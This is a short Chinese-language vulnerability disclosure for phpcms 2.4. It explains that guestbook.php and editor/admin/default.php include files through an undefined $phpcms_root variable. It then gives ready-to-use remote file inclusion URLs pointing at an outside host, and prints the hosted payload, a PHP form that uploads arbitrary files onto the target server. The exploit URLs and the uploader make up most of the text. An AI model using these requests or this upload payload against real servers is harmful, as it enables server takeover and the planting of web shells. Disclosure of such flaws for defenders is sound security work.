版本:phpcms 2.4
Bug find by cooldiyer @ 2006/12/6 @ 19:32
漏洞文件:guestbook.php、editor\admin\default.php、.......N多都有漏洞

guestbook.php漏洞代码如下


[Copy to clipboard]CODE:
require 'common.php';
require $phpcms_root.'/include/ubb.php';

editor\admin\default.php漏洞代码如下：


[Copy to clipboard]CODE:
require '../../common.php';
require $phpcms_root.'/admin/global.php';

漏洞利用演示：
http://localhost/phpcms/guestbook.php?phpcms_root=http://xdiyer.uni.cc/tools/tools/x.txt?
http://localhost/phpcms/editor/admin/default.php?phpcms_root=http://xdiyer.uni.cc/tools/tools/x.txt?

http://xdiyer.uni.cc/tools/tools/x.txt代码如下：


[Copy to clipboard]CODE:
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE="Upload" TYPE="submit"></form>
<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);exit;?>

可以上传任意文件到服务器上
总结：不要因为common.php用Zend加密了就以为phpcms_root这个变量已经定义了，事实不是这样 -